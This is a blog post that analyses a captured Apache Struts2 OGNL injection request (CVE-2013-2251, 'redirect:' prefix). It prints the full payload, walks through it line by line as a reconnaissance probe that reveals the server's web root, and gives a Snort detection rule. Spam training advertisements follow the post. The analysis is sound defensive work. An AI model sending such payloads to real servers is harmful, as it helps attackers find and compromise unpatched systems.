I recently posted notes on an Apache Struts2 Remote Code Execution attempt
Here's the guts of the attack.
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
But what is it doing? Let's walk through it in a bit more detail.
Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.
Back in 2013 Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
In this example we see the vulnerable 'redirect' method being used.
GET /How.do?redirect:
Request to Java Servlet on Apache Tomcat server that is hopefully running an old version that is vulnerable to the redirect method code execution issue
${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
Get this web request's Response so the attacker can tweak the settings on it
#res.setCharacterEncoding("UTF-8"),
Change the response to a character set that is readable like UTF-8
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
Get this web request so the attacker can change was it does
#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}
Change this request so that instead of redirecting, it prints the absolute path on disk where the apache tomcat server is hosting the web files
Summary: This attack is not actually doing anything except validating if they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where tomcat is running) then the bot will immediately send another more malicious attack that drops a persistent payload on to compromise the server.
Keep your software versions up-to-date.
FYI - This is the snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
ReplyDeleteThis is an interesting blog that you have posted, you shares a lot of useful things about Technology.
Struts Training in Chennai
struts Training in T Nagar
struts Training in OMR
struts Training in porur
Wordpress Training in Chennai
Wordpress course in Chennai
Struts Training in Chennai